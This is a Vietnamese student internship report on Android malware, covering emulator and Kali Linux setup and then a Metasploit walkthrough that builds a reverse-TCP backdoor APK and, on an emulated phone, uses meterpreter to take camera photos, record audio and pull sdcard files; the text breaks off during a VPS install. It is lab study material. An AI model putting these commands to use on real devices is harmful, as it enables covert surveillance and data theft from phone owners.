1. TT.QUẢN TRỊ MẠNG &AN NINH MẠNG QUỐC TẾ
ATHENA
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN
TP.HCM
KHOA ĐIỆN TỬ VIỄN THÔNG
[
[BÁO CÁO ĐỀ TÀI THỰC TẬP
ĐỀ TÀI :
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO
PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI
SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
GVHD : VÕ ĐỖ THẮNG
SVTH : TRẦN TRONG AN
TP.HCM -Tháng 8 / 2014
2. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
3. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
LỜI CẢM ƠN
Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh chị
nhân viên đã tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin chân thành
cám ơn Thầy Võ Tất Thắng đã nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóa thực
tập.
Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi
sai sót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh nghiệm thực
tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận
được ý kiến đóng góp của Thầy để em học thêm được nhiều kinh nghiệm .
Em xin chân thành cảm ơn !
4. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
ĐÁNH GIÁ CỦA GVHD :
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
..........................................................................................................................................
5. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
MỤC LỤC
I. Nghiên cứu hệ điều hành Android trên môi trường giả lập. ... Error! Bookmark not defined.
1. Cài đặt hệ điều hành Android qua Genymotion. ................. Error! Bookmark not defined.
2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x. ............................................... 9
2.1.Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt. ..................................................... 9
2.2. Sự khác nhau về giao diện. .............................................................................................. 10
2.3.Sự khác nhau về tính năng. .............................................................................................. 11
2.4. Sự khác nhau về giao thức mạng. ..................................................................................... 12
II. Ngiên cứu và cài đặt Kali Linux……………………………………………………...…13
1. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập thẻ Sd card,
kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa .................. 13
1.1 Tìm hiểu Kali Linux ......................................................................................................... 18
1.2 Cài đặt Kali Linux trên máy ảo VMWare .......................................................................... 24
1.3 Tạo mã độc trên Kali Linux để xâm nhập Android......................................................... 21
III. Thực hiện trên môi trường internet ................................................................................. 32
1.Cài mã độc trên VPS ............................................................................................................. 32
1.1 Cài đặt Metasploit lên VPS ............................................................................................. 33
1. Giới thiệu ............................................................................................................................... 34
2. Cài đặt ................................................................................................................................... 35
2.Từ VPS điều khiển thiết bị qua internet ................................................................................ 36
6. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
I.Nghiên cứu hệ điều hành Android trên môi trường giả lập
1. Cài đặt hệ điều hành Android qua Genymotion:
Genymotion là phần mềm giúp tạo các máy ảo Android trên PC để có thể thoải mái cài
và sử dụng app từ Google Play. Chúng ta cũng được phép truy cập vào những thành
phần hệ thống khác, ví dụ như homescreen, phần cài đặt, thanh thông báo... y hệt như
trên thiết bị di động, và lại hoàn toàn miễn phí.
Genymotion thực chất sử dụng VirtualBox để tạo ra các máy ảo, tuy nhiên nó sẽ giúp
chúng ta đơn giản được nhiều bước thiết lập. Genymotion được viết nên chủ yếu để
các lập trình viên kiểm tra phần mềm của mình trước khi đưa Google Play, nhưng
chúng ta hoàn toàn có thể dùng nó cho nhu cầu chạy app thông thường cũng được.
Genyra đời mục đích chính là để cho mọi ng trải nghiệm 1 chiếc điện thoại thật 1 cách
tốt nhất :
+ Người chưa bao giờ thấy cái điện thoại Android và muốn tập xài thử
+ Những người có máy thật muốn cài + chạy thử ứng dụng trước khi cài vào máy (đề
phòng virus,app lừa đảo)
+ Lập trình viên test thử ứng dụng của họ viết.
+ Giải trí cơ bản với game nhỏ
Geny Motion có rất nhiều ưu điểm :
- Hỗ trợ OpenGL 2.0 nên xử lí đồ họa, chơi game thì k cần hỏi ( nhưng chưa ổn định
lắm, nhiều game bị văng)
- Cài được ứng dụng, game, vào CH Play vô tư.
- Hiệu ứng chuyển mượt hơn Android X86 nhiều.
- Hỗ trợ đúng độ phân giải của 1 máy điện thoại thật ( galaxy S4,HTC One, Xperia Z)
- Tự xoay màn hình với ứng dụng cần xoay ( như chơi chém quả hoặc AngryBird )
- Có giả lập định vị GPS, giả lập Pin, giả lập Camera trước/sau
- Kết nối Eclipse để lập trình cực kì đơn giản, chỉ cần trỏ tới thư mục sdk là xong
Cài đặt Genymotion:
Đầu tiên bạn vào trang http://www.genymotion.com/, tạo một tài khoản. Sau khi đăng
nhập thành công bạn download phiên bản Windows 32/64 bits (with VirtualBox)
7. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Khi đã tải và cài đặt xong Genymotion, hãy chạy ứng dụng này lên. Chúng ta sẽ đi qua
một số bước thiết lập như sau:
Đăng nhập vào ứng dụng Genymotion bằng tài khoản mà bạn mới vừa đăng kí ở trên.
Bạn sẽ được hỏi về việc chọn thiết bị giả lập môi trường Android ảo. Có rất nhiều máy
ảo, ví dụ như HTC One, Xperia Z, Samsung Galaxy S4 cho đến các máy Nexus, có cả
8. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
một số tablet ở đây nữa. Chọn lấy máy nào đó bạn thích, rồi tiếp tục nhấn nút Add và
nút Next. Đợi cho máy ảo tải về, có thể sẽ hơi lâu đấy vì đến một hai trăm MB lận.
Nên chọn những máy ảo có chữ "with Google Apps" để có sẵn những kho Google
Play
Sau khi tải về xong, hãy nhấn đúp vào máy ảo bạn tính sử dụng. Một hộp thoại thông
báo sẽ xuất hiện, ở hộp thoại "Path to Android SDK", hãy trỏ đường dẫn đến thư mục
Android SDK mà bạn mới vừa tải về ở trên. Lưu ý là phải trỏ đúng vào thư mục có
chữ sdk bên trong nữa nhé, đến khi nào dòng chữ "ABD from Android Developer
Tools successfully found là được". Nhấn OK để hoàn tất
9. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Quay trở lại giao diện chính của Genymotion, nhấp vào máy ảo mà bạn muốn chạy.
Chờ một lát là máy sẽ xuất hiện lên như hình bên dưới. Tiếp đó bạn có thể dùng chuột
để tương tác với máy ảo Android, đăng nhập tài khoản Google, thiết lập màn hình, tải
app, nghịch app, vào phần settings...
10. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
11. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x.
2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.
Android 2.3 Android 4x
Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel
và cho không gian người sử dụng
Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel
và cho không gian người sử dụng
Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB
Màn hình:
- Màn hình phải có kích cỡ ít nhất 2,5 inch
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779
(16:9)
- Công nghệ màn hình được sử dụng là
công nghệ “ Square pixels”
Màn hình:
- Màn hình phải có kích cỡ ít nhất 426x320
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85
(16:9)
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý
Các API Android bao gồm trình quản
lý download các ứng dụng có thể sử dụng để tải
dữ liệu.Trình quản lí download phải có khả
năng tải tập tin có dung lượng ít nhất 55 MB
Các API Android bao gồm trình quản
lý download các ứng dụng có thể sử dụng để tải
dữ liệu.Trình quản lí download phải có khả
năng tải tập tin có dung lượng ít nhất 100 MB
2.2. Sự khác nhau về giao diện.
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm
ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để
xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như
ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết
bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc
kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi
một số hành động khác của người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc
sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua
bằng xoay thiết bị, giống như Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình
chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự như khái
niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm
12. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng,
còn tiện ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp
thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính
có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn
hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình
dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên
Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn
hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng
hạn. Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi
của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình
là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có
thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các
ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người
dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để
mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính năng,
như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng
gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi.
Android 2.3 Android 4x
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom
Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà
không cần mở ứng dụng
[2.3. Sự khác nhau về tính năng.
Android 2.3 Android 4x
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet
Chỉ có thể xóa tất các các thông báo cùng lúc
trên trình quản lý
Chỉ có thể xóa riêng rẽ các thông báo cùng lúc trên
trình quản lý
Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình
bị khóa
Có thể thực hiện thêm 1 số tính năng khi màn hình
bị khoái ngoài trả lời , ngắt cuộc gọi như gửi tin
nhắn
Không có tính năng mở khóa màn hình nhận Có tính năng mở khóa màn hình nhận diện khuôn
13. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
diện khuôn mặt mặt
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện được
tất cả các camera trên thiết bị
2.4. Sự khác nhau về giao thức mạng.
Android 2.3 Android 4x
Không hỗ trợ giao thức https Hỗ trợ giao thức https
3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch)
Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm
5. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập thẻ Sd
card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa
5.1 Tìm hiểu Kali Linux
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm
tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là
BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng.
Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên
bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali
Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá
bảo mật nào cũng cần sử dụng khi tác nghiệp.
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với
BackTrack, Kali có rất nhiều cải tiến:
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ
phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các
bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date)
đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống
tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã
nguồn của các công cụ.
Tính tương thích kiến trúc
14. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc
ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build
Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự
hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB
Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không
dây.
Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với
giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME,
KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều
hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều
phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã
dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải
cài lại mới hoàn toàn nữa
15. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
II.Nghiên cứu và cài đặt Kali Linux:
1. Cài đặt Kali Linux trên máy ảo VMWare
Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài
này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/
Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm
trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.
Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... .
Trên cửa sổ mới mở, chọn custom và nhấn next
16. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:
Đặt tên và đặt đường dẫn cho máy ảo
17. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định.
Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường...
Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!
18. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Phần Partition chọn Guided – use entire disk và All files in one partition
19. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Chọn Finish partitioning and write changes to disk
Chọn Yes
20. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
21. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
22. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root
và password đã đặt ở phần trước.
Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
5.3 Tạo mã độc trên Kali Linux để xâm nhập Android
23. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy
android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali
Linux bằng Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn Bridged: connection directly to the physical
network
Bấm vào Edit -> Virtual Network Editor...
24. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của
máy thật
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
25. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Đầu tiên mở terminal và gõ dòng lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R >
/root/Desktop/files.apk
192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP
của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit
reverse tcp backdoor.
26. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách
gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
27. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao
diện như dưới, nhấp vào nút reverse_tcp:
28. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
29. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Để xem thông tin về máy, nhập lệnh SysInfo
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước. Ví dụ như sau:
30. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở
/root của máy
Ghi âm
31. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
32. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Dùng lệnh cd /sdcard/Download để vào thư mục
33. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
34. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
III. Thực hiện trên môi trường internet
1.Cài mã độc trên VPS
1.1 Cài đặt Metasploit lên VPS
1. Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn
công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng
Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể
chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2. Cài đặt
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn
phiên bản Community miễn phí và dùng cho nghiên cứu.
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm
khác.
Chọn folder cài đặt:
35. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Chọn server và ngày hết hạn, để mặc định:
36. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Quá trình cài đặt của Metasploit:
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
37. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create
Account:
38. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn
